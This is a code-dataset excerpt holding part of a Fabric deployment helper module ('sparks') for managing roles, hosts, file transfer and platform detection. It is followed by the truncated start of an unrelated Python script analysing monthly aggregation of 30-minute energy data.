'mysql',\n 'pg', 'mongodb', 'redis',\n 'load', 'ha', 'loadbalancer',\n 'monitoring', 'stats',\n 'lang', 'admin',\n 'beat', 'flower', 'shell',\n]\n\nworker_information = {}\n\nfor worker_type, worker_name in (\n ('worker', 'Generic'),\n ('worker_io', 'I/O dedicated'),\n ('worker_net', 'Network'),\n ('worker_solo', 'Mono-process'),\n ('worker_duo', 'Dual-process'),\n ('worker_trio', 'Tri-process'),\n ('worker_default', 'Default'),\n ('worker_mongo', 'Mongo worker'),\n ('worker_network', 'Network'),\n ('worker_net', 'Network-related'),\n ('worker_sync', 'Synchronization'),\n ('worker_articles', 'Articles'),\n ('worker_longtasks', 'Long tasks'),\n ('worker_permanent', 'Permanent tasks'),\n ('worker_swarm', 'Swarm-processing'),\n ('worker_check', 'Checker'),\n ('worker_create', 'Create'),\n ('worker_refresh', 'Refresher'),\n ('worker_fetch', 'Fetcher'),\n ('worker_index', 'Indexer'),\n ('worker_crawl', 'Crawler'),\n ('worker_archive', 'Archive'),\n ('worker_clean', 'Cleaner'),\n ('worker_backup', 'Backup'),\n ('worker_background', 'Background'),\n ('worker_client', 'Client'),\n ('worker_server', 'Server'),\n ('worker_social', 'Social'),\n ('worker_partners', 'Partner'),\n ('worker_users', 'User processes'),\n ('worker_system', 'System'),\n ('worker_cluster', 'Cluster')):\n for sub_name, priority in (\n (worker_type, ''),\n (worker_type + '_low', 'Low-priority '),\n (worker_type + '_medium', 'Medium-priority '),\n (worker_type + '_high', 'High-priority ')):\n all_roles.append(sub_name)\n\n worker_information.update({\n sub_name: (priority + worker_name + ' worker',\n sub_name[7:] or 'celery')\n })\n\nworker_roles = [r for r in all_roles if r.startswith('worker')]\n\n\n# ===================================================== Fabric helper functions\n\n\ndef custom_roles():\n \"\"\" Return custom roles defined in the fabfile, in `worker_information`. \"\"\"\n\n custom_roles = [\n role for role in getattr(\n env, 'sparks_options', {}).get(\n 'worker_information', {}).keys() if role.startswith('worker')\n ]\n\n LOGGER.debug(u'Custom roles picked: %s', u', '.join(custom_roles))\n\n return custom_roles\n\n\ndef non_empty_roles(roles):\n \"\"\" Keep only non-empty roles. \"\"\"\n\n non_empty = []\n\n # LOGGER.debug(u'__all__ is: %s', env.roledefs.get('__all__'))\n # LOGGER.debug(u'roles is: %s', roles)\n\n for role in roles:\n if env.roledefs.get(role, []) != []:\n non_empty.append(role)\n\n # else:\n # LOGGER.debug(u'Role %s has no host, removing.', role)\n\n return non_empty\n\n\ndef execute_or_not(task, *args, **kwargs):\n \"\"\" Run Fabric's execute(), but only if there are hosts/roles to run it on.\n Else, just discard the task, and print a warning message.\n\n This allows to have empty roles/hosts lists for some tasks, in\n architectures where all roles are not needed.\n\n .. note:: if you would like to have many services on the same host\n (eg. a worker_high and a worker_low, with 2 different\n configurations), you should call execute_or_not() once at a\n time for each role, not one time with all roles grouped in a\n list parameter. See `sparks.django.fabfile.restart_services()`\n for an example. **This is a limitation of the sparks model**.\n\n .. versionadded: 2.x.\n \"\"\"\n\n # execute kwargs: host, hosts, role, roles and exclude_hosts\n\n # LOGGER.debug(u'ROLEDEFS AT execute_or_not(): %s', env.roledefs)\n\n roles = kwargs.pop('sparks_roles', ['__all__'])\n non_empty = non_empty_roles(roles)\n\n # If execute_or_not() is called without `sparks_roles`, there is a\n # chance the user picked some roles / hosts manually with “R:” / “H:”\n # fabric pseudo-tasks. In this case, pick them on-the-fly, else we\n # won't have any host to run on, while in fact the user has selected\n # some.\n if not non_empty and roles == ['__all__'] \\\n and getattr(env, 'roles_picked', False) \\\n or getattr(env, 'hosts_picked', False):\n non_empty = non_empty_roles(env.roledefs.keys())\n\n LOGGER.debug(u'Running task %s on roles: %s, current_context: %s, '\n u'matching: %s',\n task.func_name if hasattr(task, 'func_name') else task,\n roles, non_empty, env.roledefs.get(roles[0], []))\n\n # Reset in case. The role should be found preferably in\n # env.host_string.role, but in ONE case (when running sparks\n # tasks on single hosts with -H), Fabric will set it to None\n # and will reset all other attributes (thus we can't use\n # env.host_string.sparks_role for example) and we still\n # need our tasks to figure out the machine's role.\n env.sparks_current_role = None\n\n if env.host_string:\n if non_empty:\n\n should_run = False\n\n for role in non_empty:\n if env.host_string in env.roledefs[role]:\n should_run = True\n\n if not hasattr(env.host_string, 'role') \\\n or env.host_string.role is None:\n # Supposing we are running via -H, populate the role\n # manually in a dedicated attribute. Fabric's execute\n # will reset env.host_string, and it's legitimate if\n # only -H is given on CLI.\n env.sparks_current_role = role\n\n # No need to look further.\n break\n\n if should_run:\n # If the user manually specified a host string / list,\n # we must not add superfluous roles / machines.\n\n LOGGER.debug(u'Multi-run mode: execute(%s, *%s, **%s) '\n u'with %s, %s and %s.', task, args, kwargs,\n env.host_string, env.hosts, env.roles)\n\n # NOTE: don't use Fabric's execute(), it duplicates tasks.\n return task(*args, **kwargs)\n\n else:\n LOGGER.debug('Not executing %s(%s, %s): host %s not '\n 'in current role(s) “%s”.',\n getattr(task, 'name', str(task)), args, kwargs,\n env.host_string, ', '.join(roles))\n else:\n LOGGER.debug('Not executing %s(%s, %s): no role(s) “%s” in '\n 'current context.', getattr(task, 'name', str(task)),\n args, kwargs, ', '.join(roles))\n\n else:\n if non_empty:\n kwargs['roles'] = non_empty\n\n LOGGER.debug(u'One-shot mode: execute(%s, *%s, **%s)',\n task, args, kwargs)\n\n return execute(task, *args, **kwargs)\n\n else:\n LOGGER.debug('Not executing %s(%s, %s): no role(s) “%s” in '\n 'current context.', getattr(task, 'name', str(task)),\n args, kwargs, ', '.join(roles))\n\n\ndef merge_roles_hosts(roledefs):\n \"\"\" Get an exhaustive list of all machines listed\n in the current ``env.roledefs``. \"\"\"\n\n merged = set()\n\n # LOGGER.debug(u'Roles to merge: %s', u', '.join(roledefs.keys()))\n\n for role in roledefs.keys():\n merged |= set(roledefs[role])\n\n # LOGGER.debug(u'Merged host list: %s', u', '.join(merged))\n\n return sorted(list(merged))\n\n\ndef set_roledefs_and_parallel(roledefs, parallel=False):\n \"\"\" Define a sparks-compatible but Fabric-happy ``env.roledefs``.\n It's just a shortcut to avoid doing the repetitive:\n\n env.roledefs = { … }\n # fill env.roledefs with empty lists for each unused roles.\n env.parallel = True\n env.pool_size = …\n\n Sparks has a default set of roles, already suited for clouded\n web projects. You do not need all of them in all your projects.\n Via this function, you can define only the one you need, and\n sparks will take care of making your ``roledefs`` compatible with\n Fabric, which wants all roles to be defined explicitely.\n\n Feel free to set :param:`parallel` to True, or any integer >= 1\n to enable the parallel mode. If set to ``True``, the function will\n count merged hosts and set parallel to this number. It defaults\n to ``False`` (no parallel execution).\n\n .. note:: the pool size is always clamped to 10 hosts to avoid making\n your machine and network suffer. If you ever would like to raise\n this maximum value, just set your shell environment\n variable ``SPARKS_PARALLEL_MAX`` to any integer value you want,\n and don't ever rant.\n\n .. versionadded:: new in version 2.0.\n\n .. versionchanged:: in version 2.1, this method was named\n after ``set_roledefs_and_roles_or_hosts``, but the whole process\n was still under design.\n \"\"\"\n\n maximum = int(os.environ.get('SPARKS_PARALLEL_MAX', 10))\n\n if maximum < 2:\n maximum = 10\n\n env.roledefs = roledefs\n\n # LOGGER.debug(u'Fabric roledefs set to: %s', env.roledefs)\n\n # pre-set empty roles with empty lists to avoid the beautiful:\n # Fatal error: The following specified roles do not exist:\n # worker\n existing_roles = env.roledefs.keys()\n\n for key in all_roles:\n # we do not use .setdefault()\n if key not in existing_roles:\n env.roledefs[key] = []\n\n # merge all hosts for tasks that can run on any of them.\n env.roledefs.update({\n '__all__': merge_roles_hosts(env.roledefs),\n })\n\n LOGGER.debug(u'set_roledefs_and_parallel(): role “__all__” includes %s',\n u', '.join(env.roledefs['__all__']))\n\n if parallel is True:\n env.parallel = True\n nbhosts = len(set(env.hosts))\n env.pool_size = maximum if nbhosts > maximum else nbhosts\n\n else:\n try:\n parallel = int(parallel)\n\n except:\n pass\n\n else:\n if parallel > 1:\n env.parallel = True\n env.pool_size = maximum if parallel > maximum else parallel\n\n # LOGGER.debug(u'ROLEDEFS AFTER set_roledefs_and_parallel(): %s',\n # env.roledefs)\n\n\ndef generate_random_name():\n return ''.join(\n random.choice(\n string.ascii_uppercase\n + string.digits\n + string.ascii_lowercase\n ) for x in range(10))\n\n\ndef get_current_role():\n \"\"\" Return the current role of the current host. Can be ``None`` if\n there is no role in current context. \"\"\"\n\n return getattr(env.host_string, 'role', None) or env.sparks_current_role\n\n\ndef worker_information_from_role(role):\n \"\"\" Return a tuple of two strings ``(worker_name, worker_queues)``, given\n the parameter :param:`role`. The tuple is simply taken from a\n corresponding table that you can customize\n in ``env.sparks_options['worker_information']``. If the role is not\n a worker one, 2 empty strings will be returned, eg. ``('', '')``.\n\n .. note:: be respectful when customizing, the current way of doing\n things is kind of weak. It works but it's not rock solid.\n\n .. versionadded:: 3.4\n \"\"\"\n\n if role in worker_roles:\n sparks_information = worker_information.copy()\n custom_information = env.sparks_options.get('worker_information', {})\n\n sparks_information.update(custom_information)\n\n info = sparks_information.get(role, None)\n\n if info is None:\n return role.title(), re.sub('[^\\w_]+', '',\n role.lower().replace('-', '_'))\n\n return info\n\n return '', ''\n\n\n# ================================================ general-purpose Fabric tasks\n\ntry:\n @task\n def get_dir_with_sudo(remote_path, local_path=None):\n\n with cd(remote_path):\n source_basename = os.path.basename(remote_path)\n\n print('Downloading {0}:{1}…'.format(env.host_string, remote_path),\n end='')\n sys.stdout.flush()\n\n save_file_name = '../{0}-copy-{1}.tar.gz'.format(\n source_basename, generate_random_name())\n while exists(save_file_name):\n save_file_name = '../{0}-copy-{1}.tar.gz'.format(\n source_basename, generate_random_name())\n\n # chmod will allow get() to succeed, provided the\n # user has correct access to full containing path…\n sudo(\"tar -czf '{0}' . ; chmod 644 '{0}'\".format(save_file_name),\n quiet=True)\n\n with hide('running', 'stdout', 'stderr'):\n downloaded = get(save_file_name, local_path)[0]\n\n sudo('rm -f \"{0}\"'.format(save_file_name), quiet=True)\n\n local_dirname, local_basename = downloaded.rsplit(os.sep, 1)\n\n local_full_name = os.path.join(local_dirname, source_basename)\n\n with lcd(local_dirname):\n with hide('running', 'stdout', 'stderr'):\n local('mkdir -p \"{0}\"'.format(source_basename))\n\n with lcd(source_basename):\n local('tar -xzf \"../{0}\"'.format(local_basename))\n\n local('rm -f \"{0}\"'.format(local_basename))\n\n print('into {1} directory.'.format(remote_path,\n local_full_name))\n\n return local_full_name\n\n @task\n def put_dir_with_sudo(local_path, remote_path):\n # TODO: implement remote_path=None & return remote_path\n\n with lcd(local_path):\n source_basename = os.path.basename(local_path)\n\n print('Uploading {0} to {1}:{2}…'.format(local_path,\n env.host_string, remote_path), end='')\n sys.stdout.flush()\n\n save_file_name = '../{0}-copy-{1}.tar.gz'.format(\n source_basename, generate_random_name())\n while os.path.exists(save_file_name):\n save_file_name = '../{0}-copy-{1}.tar.gz'.format(\n source_basename, generate_random_name())\n\n with hide('running', 'stdout', 'stderr'):\n local(\"tar -czf '{0}' . \".format(save_file_name))\n\n remote_dirname, remote_basename = remote_path.rsplit(os.sep, 1)\n\n with hide('running', 'stdout', 'stderr'):\n put(save_file_name, remote_dirname, use_sudo=True)\n local('rm -f \"{0}\"'.format(save_file_name))\n\n with cd(remote_dirname):\n with hide('running', 'stdout', 'stderr'):\n sudo('mkdir -p \"{0}\"'.format(remote_basename))\n\n with cd(remote_basename):\n sudo('tar -xzf \"{0}\"'.format(save_file_name))\n sudo('rm -f \"{0}\"'.format(save_file_name))\n\n print(' done.')\n\nexcept NameError:\n # Fabric is not yet installed. Don't crash. Happens during the first setup.\n pass\n\n\n# =================================================== Remote system information\n\ndef is_localhost(hostname):\n return hostname in ('localhost', 'localhost.localdomain',\n '127.0.0.1', '127.0.1.1', '::1')\n\n\ndef is_local_environment():\n\n is_local = env.environment == 'local' or (\n env.environment == 'test'\n and is_localhost(env.host_string))\n\n return is_local\n\n\ndef is_development_environment():\n\n is_development = (is_local_environment()\n or env.environment in ('test', 'development', 'preview'))\n\n return is_development\n\n\ndef is_production_environment():\n\n is_production = (not is_development_environment()\n and env.environment in ('production', 'real'))\n\n return is_production\n\n\nclass ConfigurationMixin(object):\n \"\"\" Common methods to Remote & Local configuration classes. \"\"\"\n\n def __getattr__(self, key):\n \"\"\" This lazy getter will allow to load the Django settings after\n Fabric and the project fabfile has initialized `env`. Doing\n elseway leads to cycle dependancy KeyErrors. \"\"\"\n\n if key == 'django_settings':\n try:\n self.get_django_settings()\n\n except ImportError:\n raise AttributeError(u'%s Django settings could not be '\n u'loaded.' % ('Remote' if 'Remote'\n in self.__class__.__name__\n else 'Local'))\n\n return self.django_settings\n\n @property\n def is_osx(self):\n return self.mac is not None\n\n @property\n def is_arch(self):\n return self.lsb and self.lsb.ID == 'arch'\n\n @property\n def is_bsd(self):\n return self.bsd is not None\n\n @property\n def is_freebsd(self):\n return self.bsd and self.bsd.ID == 'FreeBSD'\n\n @property\n def is_ubuntu(self):\n return self.lsb and self.lsb.ID.lower() == 'ubuntu'\n\n @property\n def is_debian(self):\n return self.lsb and self.lsb.ID.lower() == 'debian'\n\n @property\n def is_deb(self):\n return self.lsb and self.lsb.ID.lower() in ('ubuntu', 'debian',)\n\n @property\n def release_formatted(self):\n\n if self.mac:\n return u'Apple OSX {0}'.format(self.mac.release)\n\n if self.lsb:\n return u'{0} {1}'.format(self.lsb.ID.title(), self.lsb.RELEASE)\n\n if self.bsd:\n return u'{0} {1}'.format(self.bsd.ID, self.bsd.RELEASE)\n\n @property\n def vm_formatted(self):\n return ('VMWare '\n if self.is_vmware\n else 'Parallels '\n ) if self.is_vm else ''\n\n\nclass RemoteConfiguration(ConfigurationMixin):\n \"\"\" Define an easy to use object with remote machine configuration. \"\"\"\n\n def __init__(self, host_string):\n\n self.host_string = host_string\n\n # No need to `deactivate` for this calls, it's pure shell.\n self.user, self.tilde = run('echo \"${USER},${HOME}\"',\n quiet=not DEBUG).strip().split(',')\n\n self.get_platform()\n self.get_uname()\n self.get_virtual_machine()\n\n if not QUIET:\n print('Remote is {release} {host} {vm}{arch}, user '\n '{user} in {home}.'.format(\n release=self.release_formatted,\n host=cyan(self.uname.nodename),\n vm=self.vm_formatted,\n arch=self.uname.machine,\n user=cyan(self.user),\n home=self.tilde,\n ))\n\n def reload(self):\n \"\"\" This methods just reloads the remote Django settings, because\n anything else is very unlikely to have changed. \"\"\"\n\n self.get_django_settings()\n\n def get_platform(self):\n # Be sure we don't get stuck in a virtualenv for free.\n with prefix('deactivate >/dev/null 2>&1 || true'):\n out = run(\"python -c 'from __future__ import print_function; \"\n \"import platform; \"\n \"print(platform.system())'\",\n quiet=not DEBUG, combine_stderr=False)\n\n self.lsb = None\n self.mac = None\n self.bsd = None\n\n out = out.strip().lower()\n\n if out == u'linux':\n distro = run(\"python -c 'from __future__ import print_function; \"\n \"import platform; \"\n \"print(\\\",\\\".join(platform.linux_distribution()))'\",\n quiet=not DEBUG,\n combine_stderr=False).strip().split(',')\n\n if distro[0].lower() in ('debian', 'ubuntu'):\n\n self.lsb = SimpleObject()\n self.lsb.ID = distro[0]\n self.lsb.RELEASE = distro[1]\n self.lsb.CODENAME = distro[2]\n\n elif distro[0].lower() == 'arch' or (\n distro == ('', '', '')\n and 'ARCH' in platform.platform()):\n # http://bugs.python.org/issue12214\n # is implemented only for Python 3.3+.\n self.lsb = SimpleObject()\n self.lsb.ID = 'arch'\n self.lsb.RELEASE = platform.release()\n self.lsb.CODENAME = 'ArchLinux'\n\n else:\n raise RuntimeError(u'Unsupported Linux distro {1} on {0}, '\n u'please get in touch with 1flow/sparks '\n u'developers.'.format(\n self.host_string, distro[0]))\n\n elif out == u'darwin':\n\n # Be sure we don't get stuck in a virtualenv for free.\n with prefix('deactivate >/dev/null 2>&1 || true'):\n out = run(\"python -c 'from __future__ import print_function; \"\n \"import platform; \"\n \"print(platform.mac_ver())'\", quiet=not DEBUG,\n combine_stderr=False)\n\n try:\n for line in out.splitlines():\n if line.startswith(\"('\"):\n self.mac = SimpleObject(from_dict=dict(zip(\n ('release', 'version',\n 'machine'),\n ast.literal_eval(line))))\n break\n\n except SyntaxError:\n # something went very wrong,\n # none of the detection methods worked.\n raise RuntimeError(u'Cannot determine platform of {0}, '\n u'platform.mac_ver() reported nothing '\n u'usable:\\n{1}'.format(self.host_string,\n out))\n else:\n if self.mac is None:\n raise RuntimeError(u'Cannot determine platform of {0}, '\n u'platform.mac_ver() reported nothing '\n u'usable:\\n{1}'.format(self.host_string,\n out))\n\n elif out == u'freebsd':\n release = run(\"python -c 'from __future__ import print_function; \"\n \"import platform; \"\n \"print(platform.release())'\",\n quiet=not DEBUG,\n combine_stderr=False).strip()\n\n self.bsd = SimpleObject()\n self.bsd.ID = 'FreeBSD'\n self.bsd.RELEASE = release\n self.bsd.VERSION = release.split('-')[0]\n self.bsd.MAJOR = int(self.bsd.VERSION.split('.')[0])\n self.bsd.MINOR = int(self.bsd.VERSION.split('.')[1])\n\n else:\n raise RuntimeError(u'Unsupported platform {1} on {0}, please '\n u'get in touch with 1flow/sparks '\n u'developers.'.format(self.host_string, out))\n\n def get_uname(self):\n # Be sure we don't get stuck in a virtualenv for free.\n with prefix('deactivate >/dev/null 2>&1 || true'):\n out = run(\"python -c 'from __future__ import print_function; \"\n \"import os; print(os.uname())'\",\n quiet=not DEBUG, combine_stderr=False)\n\n self.uname = None\n\n for line in out.splitlines():\n if line.startswith(\"('\"):\n self.uname = SimpleObject(from_dict=dict(zip(\n ('sysname', 'nodename', 'release',\n 'version', 'machine'),\n ast.literal_eval(line))))\n break\n\n # Python 3.x (tested on ArchLinux 20140826)\n if line.startswith(\"posix.uname_result(\"):\n self.uname = SimpleObject(from_dict=ast.literal_eval(\n 'dict' + line[18:]))\n break\n\n if self.uname is None:\n raise RuntimeError(u'cannot determine uname of {0}, '\n u'os.uname() reported nothing usable:\\n'\n u'{1}'.format(self.host_string, out))\n\n self.hostname = self.uname.nodename\n\n def get_virtual_machine(self):\n # TODO: implement me (and under OSX too).\n self.is_vmware = False\n\n # NOTE: this test could fail in VMs where nothing is mounted from\n # the host. In my own configs, this never occurs, but who knows.\n # TODO: check this works under OSX too, or enhance the test.\n self.is_parallel = run('mount | grep prl_fs', quiet=not DEBUG,\n warn_only=True, combine_stderr=False).succeeded\n\n self.is_vm = self.is_parallel or self.is_vmware\n\n def get_django_settings(self):\n\n # transform the supervisor syntax to shell syntax.\n env_generic = ' '.join(env.environment_vars) \\\n if hasattr(env, 'environment_vars') else ''\n\n env_sparks = (' SPARKS_DJANGO_SETTINGS={0}'.format(\n env.sparks_djsettings)) \\\n if hasattr(env, 'sparks_djsettings') else ''\n\n env_django_settings = \\\n ' DJANGO_SETTINGS_MODULE=\"{0}.settings\"'.format(env.project)\n\n # Here, we *NEED* to be in the virtualenv, to get the django code.\n # NOTE: this code is kind of weak, it will fail if settings include\n # complex objects, but we hope it's not.\n\n prefix_cmd = 'workon {0}'.format(env.virtualenv) \\\n if hasattr(env, 'virtualenv') else ''\n\n pickled_settings = StringIO.StringIO()\n\n with prefix(prefix_cmd):\n with cd(env.root if hasattr(env, 'root') else ''):\n # NOTE: this doesn't work with “ with open(…) as f: ”, even\n # though I would have greatly prefered this modern version…\n out = run((\"{0}{1}{2} python -c 'import cPickle as pickle; \"\n \"from django.conf import settings; \"\n \"settings._setup(); \"\n \"f=open(\\\"__django_settings__.pickle\\\", \"\n \"\\\"w\\\"); pickle.dump(settings._wrapped, f, \"\n \"pickle.HIGHEST_PROTOCOL); f.close()'\").format(\n env_generic, env_sparks, env_django_settings),\n quiet=not DEBUG, warn_only=True, combine_stderr=False)\n\n if out.succeeded:\n get('__django_settings__.pickle',\n pickled_settings)\n run('rm -f __django_settings__.pickle',\n quiet=not DEBUG)\n\n try:\n self.django_settings = pickle.loads(\n pickled_settings.getvalue())\n\n except:\n LOGGER.exception('Cannot load remote django settings!')\n\n pickled_settings.close()\n\n else:\n LOGGER.warning(('Could not load remote Django settings '\n 'for project \"{0}\" (which should be '\n 'located in \"{1}\", with env. {2}{3}'\n ')').format(\n env.project,\n env.root if hasattr(env, 'root') else '~',\n env_generic, env_sparks))\n raise ImportError\n\n\nclass LocalConfiguration(ConfigurationMixin):\n \"\"\" Define an easy to use object with local machine configuration.\n\n This class doesn't use fabric, it's used to bootstrap the local\n machine when it's empty and doesn't have fabric installed yet.\n\n .. warning:: this class won't probably play well in a virtualenv.\n Unlike the :class:`RemoteConfiguration` class, I don't think\n it's pertinent and wanted to :program:`deactivate` first.\n \"\"\"\n def __init__(self, host_string=None):\n\n self.host_string = host_string or 'localhost'\n\n system = platform.system().lower()\n\n self.lsb = None\n self.mac = None\n self.bsd = None\n\n if system == 'linux':\n distro = platform.linux_distribution()\n\n if distro[0].lower() in ('debian', 'ubuntu'):\n self.lsb = SimpleObject()\n self.lsb.ID = distro[0]\n self.lsb.RELEASE = distro[1]\n self.lsb.CODENAME = distro[2]\n\n elif distro[0].lower() == 'arch' or (\n distro == ('', '', '') and 'ARCH' in platform.platform()):\n # http://bugs.python.org/issue12214\n # is implemented only for Python 3.3+.\n self.lsb = SimpleObject()\n self.lsb.ID = 'arch'\n self.lsb.RELEASE = platform.release()\n self.lsb.CODENAME = 'ArchLinux'\n\n else:\n raise RuntimeError(u'Unsupported Linux distro {1} on '\n u'localhost, please get in touch with '\n u'1flow/sparks developers.'.format(\n distro[0]))\n\n elif system == 'darwin':\n self.mac = SimpleObject(from_dict=dict(zip(\n ('release', 'version', 'machine'),\n platform.mac_ver())))\n\n elif system == u'freebsd':\n release = platform.release()\n\n self.bsd = SimpleObject()\n self.bsd.ID = 'FreeBSD'\n self.bsd.RELEASE = release\n self.bsd.VERSION = release.split('-')[0]\n self.bsd.MAJOR = int(self.bsd.VERSION.split('.')[0])\n self.bsd.MINOR = int(self.bsd.VERSION.split('.')[1])\n\n else:\n raise RuntimeError(u'Unsupported platform {0} on localhost, '\n u'please get in touch with 1flow/sparks '\n u'developers.'.format(system))\n\n self.uname = SimpleObject(from_dict=dict(zip(\n ('sysname', 'nodename', 'release',\n 'version', 'machine'),\n os.uname())))\n\n self.hostname = self.uname.nodename\n\n self.user, self.tilde = nofabric.local('echo \"${USER},${HOME}\"',\n ).strip().split(',')\n\n # TODO: implement me (and under OSX too).\n self.is_vmware = False\n\n # NOTE: this test could fail in VMs where nothing is mounted from\n # the host. In my own configs, this never occurs, but who knows.\n # TODO: check this works under OSX too, or enhance the test.\n self.is_parallel = nofabric.local('mount | grep prl_fs').succeeded\n\n self.is_vm = self.is_parallel or self.is_vmware\n\n def __getattr__(self, key):\n \"\"\" This lazy getter will allow to load the Django settings after\n Fabric and the project fabfile has initialized `env`. Doing\n elseway leads to cycle dependancy KeyErrors. \"\"\"\n\n if key == 'django_settings':\n try:\n self.get_django_settings()\n\n except ImportError:\n raise AttributeError(\n 'Local Django settings could not be loaded.')\n\n return self.django_settings\n\n def get_django_settings(self):\n\n # Set the environment exactly how it should be for runserver.\n # Supervisor environment can hold the sparks settings,\n # while Django environment will hold the project settings.\n\n if hasattr(env, 'environment_vars'):\n for env_var in env.environment_vars:\n name, value = env_var.strip().split('=')\n os.environ[name] = value\n\n if hasattr(env, 'sparks_djsettings'):\n os.environ['SPARKS_DJANGO_SETTINGS'] = env.sparks_djsettings\n\n os.environ['DJANGO_SETTINGS_MODULE'] = \\\n '{0}.settings'.format(env.project)\n\n # Insert the $CWD in sys path, and pray for the user to have called\n # `fab` from where `manage.py` is. This is the way it should be done\n # but who knows…\n current_root = env.root if (hasattr(env, 'root')\n and is_local_environment()) else os.getcwd()\n sys.path.append(current_root)\n\n try:\n from django.conf import settings as django_settings\n # Avoid Django to (re-)configure our own logging;\n # the Fabric output becomes a mess without this.\n django_settings.__class__._configure_logging = lambda x: None\n\n django_settings._setup()\n\n except ImportError:\n LOGGER.warning(('Django settings could not be loaded for '\n 'project \"{0}\" (which should be '\n 'located in \"{1}\", with env. {2}{3}'\n ')').format(\n env.project,\n current_root,\n 'SPARKS_DJANGO_SETTINGS={0}'.format(\n env.sparks_djsettings)\n if hasattr(env, 'sparks_djsettings') else '',\n ' '.join(env.environment_vars)\n if hasattr(env, 'environment_vars') else ''))\n raise\n else:\n self.django_settings = django_settings._wrapped\n\n finally:\n sys.path.remove(current_root)\n\n del os.environ['DJANGO_SETTINGS_MODULE']\n\n if hasattr(env, 'sparks_djsettings'):\n del os.environ['SPARKS_DJANGO_SETTINGS']\n\n if hasattr(env, 'environment_vars'):\n for env_var in env.environment_vars:\n del os.environ[name]\n\n\ndef with_remote_configuration(func):\n\n @functools.wraps(func)\n def wrapped(*args, **kwargs):\n global remote_configuration\n if remote_configuration is None:\n try:\n remote_configuration = find_configuration_type(env.host_string)\n except NameError:\n # no 'env', probably running from 1nstall.\n remote_configuration = find_configuration_type('localhost')\n\n elif remote_configuration.host_string != env.host_string:\n # host changed: fabric is running the same task on another host.\n remote_configuration = find_configuration_type(env.host_string)\n\n # Insert remote_configuration directly in kwargs.\n # This avoids the following error:\n # TypeError: XXX() got multiple values\n # for keyword argument 'remote_configuration'\n # at the price of some overwriting. We just hope that no-one\n # will have the bad idea of naming his KWargs the same.\n kwargs['remote_configuration'] = remote_configuration\n\n return func(*args, **kwargs)\n\n return wrapped\n\n\ndef with_local_configuration(func):\n\n @functools.wraps(func)\n def wrapped(*args, **kwargs):\n global local_configuration\n if local_configuration is None:\n local_configuration = LocalConfiguration()\n\n return func(*args, local_configuration=local_configuration, **kwargs)\n\n return wrapped\n\n\ndef find_configuration_type(hostname):\n\n if is_localhost(hostname):\n return LocalConfiguration()\n\n else:\n return RemoteConfiguration(hostname)\n\n\nif os.environ.get('SPARKS_PARAMIKO_VERBOSE', False):\n paramiko_logging_level = logging.WARNING\nelse:\n # but please, no paramiko, it's just flooding my terminal.\n paramiko_logging_level = logging.ERROR\n\nif DEBUG:\n sparks_logging_level = logging.DEBUG\n\nelif QUIET:\n sparks_logging_level = logging.WARNING\n\nelse:\n sparks_logging_level = logging.INFO\n\nlogging.basicConfig(\n format='%(asctime)s %(name)s[%(levelname)s] %(message)s',\n level=sparks_logging_level\n)\nlogging.getLogger('paramiko').setLevel(paramiko_logging_level)\n\nif local_configuration is None:\n local_configuration = LocalConfiguration()\n","sub_path":"sparks/fabric/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":39782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"147832790","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 11 11:17:46 2020\n\n@author: Chae Gordon\n\"\"\"\n\"\"\"\nThe aim of this code is to calculate the probable value for loss occuring from\naggregation onto a month scale.\n\nI think the thing to do to save on computing time is initially calculate the\nloss due to aggregation compared with 30 min data --> then apply the 14% from\nprevious analysis.\n\nThen can look to interpolate entire months (longer compute time)\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport math\nimport matplotlib.pyplot as plt\n\nthrottle_a = []\nloss_a = []\nenergy_vio_a = []\n\nsigma = 0.03 \n\n# 30 min period\n\nmonth = 48*(365/12)\nyear = 48*365\np_to_E_conv = 1/2\n\ndf_2 = (1/p_to_E_conv)*pd.read_excel(\"Gigha_data_30_min.xlsx\").values\n\n# transform 48 30 min rows into a time series\n\npower = []\nfor i in range(len(df_2)):\n for j in range(48):\n power.append(df_2[i,j+2])\n \n\ndf = pd.DataFrame(data=power, columns=[\"Average Power/ kW\"])\n\npower_split_m = np.array_split(df.values, math.ceil(len(df)/month)) # split into months\n\npower_agg_m = np.array([sum(i) for i in power_split_m]) # aggregate the months\n\n\"\"\"Want to calculate utilisation from this & from the agg. value and compare\"\"\"\n\n# need list comps like this --> for it to work\ntest_logic = [i if i <= np.average(power_agg_m) else np.average(power_agg_m) for i in power_agg_m]\n\n\nagg_useable_energy = sum([i if i <= np.average(power_agg_m) else np.average(power_agg_m) for i in power_agg_m])\nmax_useable_energy = (len(power_agg_m)*np.average(power_agg_m))\nagg_utilisation = agg_useable_energy/max_useable_energy\n\n# the loss is high but this is partly a sizing issue, can get to ca. 21% error with 1.5 times sizing\n# going to need to run sizing algorithm\n\n\nacc_useable_energy = sum([i if i <= 1.5*np.average(power_agg_m)/month else 1.5*np.average(power_agg_m)/month for i in df.values])\nacc_utilisation = acc_useable_energy/max_useable_energy\n\nutil_error = acc_utilisation - agg_utilisation\ntotal_agg_spill = abs(util_error)+(1-abs(util_error))*0.14\nprint(\"util error\", util_error)\n\nprint(\"total spill then\",total_agg_spill)\n\n# avoiding the fact that don't have all 5 years use [] in the arguments\n\n\"\"\"\n# rounds years up\n\ncounter = [math.ceil(len(df)/year) -1 if math.ceil(len(df)/year) > 1 else 0][0]\n\nlisty = [(i+1)*year for i in range(counter)]\n\npower_split_y = np.array_split(df.values, listy) # split into years\n\npower_agg_y = np.array([sum(i) for i in power_split_y]) # aggregate into years\n\n# only inlcuding complete years\n\n# p_to_E_conv to convert power to energy (kWh)\nif counter == 0:\n yearly_figures = (p_to_E_conv)*power_agg_y[:]\n monthly_figures = (p_to_E_conv)*power_agg_m[:]\nelse:\n yearly_figures = (p_to_E_conv)*power_agg_y[:counter]\n monthly_figures = (p_to_E_conv)*power_agg_m[:counter*12]\n \n \n# want to take the 30 minute power data and interpolate into 1-minute data\n \n# normalising data into fractional values of total rated power\n \npower = df[\"Average Power/ kW\"]\n \nmax_power = df[\"Average Power/ kW\"].max() \n\npower_split = np.array_split(power.values, int(len(power)/24)) # split into 12 hrs\n\npower_agg = np.array([sum(i) for i in power_split]) # aggregate the 12 hours\n\nsigma_12 = np.std(power_agg/max(power_agg))\n\npower = df[\"Average Power/ kW\"]/max_power\n\npower = power.values\n\nprint(sigma_12)\n\nloss_at_load_factor = 